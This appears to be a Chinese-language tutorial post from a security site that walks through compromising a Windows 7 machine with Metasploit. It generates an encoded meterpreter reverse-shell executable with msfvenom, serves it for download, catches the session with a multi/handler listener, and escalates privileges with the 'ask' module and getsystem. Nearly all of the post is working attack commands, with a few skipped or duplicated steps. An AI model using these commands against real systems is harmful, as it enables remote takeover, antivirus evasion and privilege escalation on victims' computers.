标题 | 简介 | 类型 | 公开时间 | ||||||||||
|
|||||||||||||
|
|||||||||||||
详情 | |||||||||||||
[SAFE-ID: JIWO-2025-2664] 作者: 浩丶轩 发表于: [2020-05-15]
本文共 [582] 位读者顶过
1. msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows LHOST=192.168.2.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 7 -f exe -o a.exe --产生一个exe文件[出自:jiwo.org]
2. service apache2 start --开启apache服务
5. 打开win7访问kali ip 下载a.exe
6. Msfconsole --启动msf
7. use exploit/multi/handler --使用这个模块
8. set payload windows/meterpreter/reverse_tcp --配置payload
9. set lhost 192.168.2.128 --配置kali ip
10. set lport 4444 --配置监听端口 和exe文件端口一样 ![]() 12. exploit -j --开始监听
12. exploit -j --开始监听
14. 在kali上就会返回一个会话用sessions 查看
15. sessions -i 1 --进入会话
16. load priv --更新插件
17. Getsystem --获取权限 发现没有权限 需要提权
19. use exploit/windows/local/ask --进入提权模块
20. show options --查看配置参数
21. set payload windows/meterpreter/reverse_tcp --设置payload
22. set lhost 192.168.2.128 --设置kali ip ![]()
26. Exploit --攻击 会多一个会话 28. load priv 更新插件 29. Getsystem --提权 ![]()
--上边那个提权还要弹窗 接下来再说一个模块不需要用户在点击 “是” |